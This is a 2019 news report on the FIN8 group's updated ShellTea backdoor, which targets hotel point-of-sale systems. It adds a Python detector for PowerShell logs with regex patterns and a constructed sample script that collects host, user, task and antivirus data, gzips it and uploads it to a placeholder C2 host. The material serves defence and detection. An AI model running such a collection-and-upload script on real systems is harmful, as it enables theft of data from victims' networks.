13 June 2019

FIN8 hacking group reappears with updated ShellTea backdoor, targets POS devices in the hotel industry

After being mostly silent for two years, the FIN8 hacking group has returned with a new campaign aimed at companies in the hospitality sector. As opposed to APT (advanced persistent threat) groups, which focus on intelligence gathering and cyber-espionage, FIN8 conducts attacks for its own financial profit. And while some financially motivated hackers target banks and other companies in the financial sector, this group is primarily focused on attacking point-of-sale (PoS) systems in an effort to steal payment card data, which it then puts up for sale on online hacking forums.

In 2016-2017, FireEye and root9B published reports detailing a string of FIN8 attacks aimed at PoS systems in the retail sector. The group then went on hiatus for nearly two years, but in March 2019 the cyber-security firm Morphisec spotted a new wave of attacks targeting companies in the hospitality industry. According to the report, the firm was able to stop the attacks before any data was stolen.

As with previous campaigns, the group started its attack with spear-phishing emails in order to install the ShellTea (PunchBuggy) backdoor, designed to steal data from POS devices, on a victim's network. While FIN8 used the same ShellTea backdoor as in previous campaigns, this time the hackers made some changes to the malware to help it avoid detection and other security controls.

According to the researchers, FIN8 made several improvements to its malware arsenal, fixing bugs and making the malicious tools harder to detect. For instance, in the new ShellTea version the hashing algorithm used to hash most of the functions (a technique meant to evade standard analysis tools) has been slightly modified. Additionally, the PowerShell script used in part of the attack can now collect a significant amount of data from the network, including snapshots, computer and user names, emails from the registry, tasks in the task scheduler, system information, the anti-virus registered in the system, privileges, and domain and workgroup information. The results are gzipped and saved under a randomly named file in the temp folder; the data is then sent back to the C2 and the file is deleted.
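The collect, compress, upload, delete sequence described above is something a defender can look for in PowerShell script-block logging (Event ID 4104, which records the full script text). The scorer below is an added example, not code from Morphisec's report or from ShellTea itself; the indicator regexes are assumptions about how such steps commonly appear in PowerShell, and both log entries are constructed.

```python
import re

# Indicator regexes for the behaviours the article attributes to the script.
# These patterns are assumptions about typical PowerShell phrasing of each step,
# not signatures taken from the actual campaign.
COLLECTION = {
    "screenshot": re.compile(r"CopyFromScreen", re.I),
    "host_user": re.compile(r"\$env:(COMPUTERNAME|USERNAME)", re.I),
    "sched_tasks": re.compile(r"schtasks|Get-ScheduledTask", re.I),
    "antivirus": re.compile(r"AntiVirusProduct|SecurityCenter2", re.I),
    "domain": re.compile(r"Win32_ComputerSystem|\$env:USERDOMAIN", re.I),
}
STAGING = {
    "gzip": re.compile(r"GZipStream", re.I),
    "temp_random": re.compile(r"\$env:TEMP.*GetRandomFileName", re.I | re.S),
    "send": re.compile(r"UploadFile|UploadData|Invoke-WebRequest|Invoke-RestMethod", re.I),
    "cleanup": re.compile(r"Remove-Item|::Delete\(", re.I),
}

def classify(script_text: str) -> dict:
    """Score one script-block log entry (full script text of a 4104 event)."""
    hits = {k for k, rx in COLLECTION.items() if rx.search(script_text)}
    stages = {k for k, rx in STAGING.items() if rx.search(script_text)}
    # Verdict: the complete staging chain plus at least two kinds of collection.
    suspicious = stages == set(STAGING) and len(hits) >= 2
    return {"collection": sorted(hits), "staging": sorted(stages), "suspicious": suspicious}

# Constructed sample entries (not real captured logs).
SUSPICIOUS_SAMPLE = r'''
$cs = Get-WmiObject Win32_ComputerSystem
$info = @{ host = $env:COMPUTERNAME; user = $env:USERNAME }
$tasks = schtasks /query /fo csv
$av = Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
$out = Join-Path $env:TEMP ([IO.Path]::GetRandomFileName())
$gz = New-Object IO.Compression.GZipStream($fs, [IO.Compression.CompressionMode]::Compress)
(New-Object Net.WebClient).UploadFile("http://c2.example.invalid/up", $out)
Remove-Item $out
'''
BENIGN_SAMPLE = r'''
Get-ChildItem $env:TEMP | Where-Object LastWriteTime -lt (Get-Date).AddDays(-7) | Remove-Item
'''

if __name__ == "__main__":
    for name, text in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, classify(text))
```

The benign entry touches the temp folder and deletes files but never compresses or uploads, so the incomplete staging chain keeps it below the threshold.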

The hospitality industry, and particularly its POS networks, continues to be one of the sectors most targeted by cybercrime groups, the experts note. The focus on the hotel industry could be explained by the fact that many POS networks run the POS edition of Windows 7, making them more susceptible to vulnerabilities. Additionally, many POS systems run with only rudimentary security, as traditional antivirus is too heavy and requires constant updating that can interfere with system availability.
